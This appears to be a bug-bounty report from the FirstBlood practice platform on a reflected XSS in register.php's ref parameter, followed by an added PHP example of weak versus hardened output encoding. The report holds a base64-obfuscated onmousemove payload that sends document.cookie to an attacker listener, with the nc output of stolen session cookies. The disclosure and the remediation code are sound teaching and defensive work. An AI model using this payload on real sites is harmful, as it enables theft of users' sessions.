FirstBlood-#116 — Reflective XSS at http://firstbloodhackers.com:49369/register.php
This issue was discovered on FirstBlood v1
On 2021-05-10, 0xconft Level 5 reported:
Hi there,
I found a Reflective XSS at http://firstbloodhackers.com:49369/register.php via the ref parameter, and since firstbloodhackers.com doesn't set the HttpOnly flag on its cookie header, this XSS can be used to steal the cookie.
PoC (alert): you must hover your mouse over the "return to previous page" banner.
http://firstbloodhackers.com:49369/register.php?ref=x%27+onmousemove=%27alert(1)%27
When a doctor accesses this URL while logged in at firstbloodhackers.com and hovers their mouse over the "return to previous page" banner, the XSS will be executed and the cookie will be sent to the attacker's server:
http://firstbloodhackers.com:49369/register.php?ref=x%27+onmousemove=%27eval(atob(`dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vcGVuKCdHRVQnLCAnaHR0cDovLzE5Mi4xNjguMC4yMDoxMzM3Lz91PScrZG9jdW1lbnQuY29va2llKTt4aHIuc2VuZCgpOw`))%27
The cookie will be sent to the attacker's server:
$ nc -lvp 1337
Listening on 0.0.0.0 1337
Connection received on 192.168.0.20 56186
GET /?u=drps=3d0582d27073a87a4db320f57;%20doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9 HTTP/1.1
Host: 192.168.0.20:1337
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://firstbloodhackers.com:49369
Connection: close
Referer: http://firstbloodhackers.com:49369/
Best Regards,
0xconft
P3 Medium
Endpoint: /register.php
Parameter: ?ref
Payload: x%27+onmousemove=%27eval(atob(`dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vcGVuKCdHRVQnLCAnaHR0cDovLzE5Mi4xNjguMC4yMDoxMzM3Lz91PScrZG9jdW1lbnQuY29va2llKTt4aHIuc2VuZCgpOw`))%27
FirstBlood ID: 4
Vulnerability Type: Reflective XSS
The parameter "ref" is vulnerable to XSS on register.php. The developer made use of htmlentities, but this is inadequate here because the href attribute is wrapped in single quotes, which htmlentities leaves unencoded by default.
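The following is an added example, not FirstBlood's own register.php and not the reporter's code. It reconstructs the pattern described above in PHP: the ref value rendered into a single-quoted href with htmlentities() and its default quote handling (the weak form), beside the same rendering with ENT_QUOTES (the hardened form), plus a small attribute-count check that makes the breakout visible. The function names, the anchor markup and the input value are assumptions; the input is the decoded alert(1) payload from the report.

```php
<?php
// Added example: models how a "ref" query value lands inside a single-quoted
// href attribute. Names and markup are hypothetical, not FirstBlood's code.

// Weak: ENT_COMPAT (the default flags before PHP 8.1) encodes <, >, & and "
// but leaves the single quote untouched, so a value containing ' can close
// the attribute and append new ones.
function render_ref_link_weak(string $ref): string
{
    $encoded = htmlentities($ref, ENT_COMPAT, 'UTF-8');
    return "<a href='" . $encoded . "'>return to previous page</a>";
}

// Hardened: ENT_QUOTES also encodes ' as &#039;, so the value cannot leave
// the attribute. ENT_SUBSTITUTE keeps htmlentities() from returning an empty
// string on invalid UTF-8, which would otherwise silently drop the link.
function render_ref_link_hardened(string $ref): string
{
    $encoded = htmlentities($ref, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<a href='" . $encoded . "'>return to previous page</a>";
}

// Check: count single-quoted attributes inside the opening <a ...> tag.
// A correctly encoded value yields exactly one (href); a breakout yields more.
function attribute_count(string $html): int
{
    if (!preg_match('/<a\s+([^>]*)>/i', $html, $m)) {
        return 0;
    }
    return preg_match_all('/\b[a-z-]+\s*=\s*\'[^\']*\'/i', $m[1]);
}

// Constructed input: the decoded form of the report's alert(1) payload.
$ref = "x' onmousemove='alert(1)";

$weak = render_ref_link_weak($ref);
$hard = render_ref_link_hardened($ref);

echo "weak:     $weak\n";
echo "hardened: $hard\n";
echo "attributes in weak tag:     " . attribute_count($weak) . "\n"; // 2
echo "attributes in hardened tag: " . attribute_count($hard) . "\n"; // 1

// Defence in depth against the cookie-theft part of the report: a session
// cookie set with HttpOnly is not readable through document.cookie even when
// an XSS exists. setcookie() must run before any output, so it is shown here
// as a comment only; cookie name and value are placeholders.
// setcookie('session', $sessionValue,
//     ['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
```

Run with `php example.php`. Output encoding only fixes the attribute breakout; because the value is used as a link target, the hardened handler should additionally validate that ref is a relative path on the same site before rendering it, and the HttpOnly flag should be set on the session cookie regardless of how the reflection is fixed.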
Creator & Administrator
Great finding, even though this is a dupe, I'm awarding a bounty at my discretion.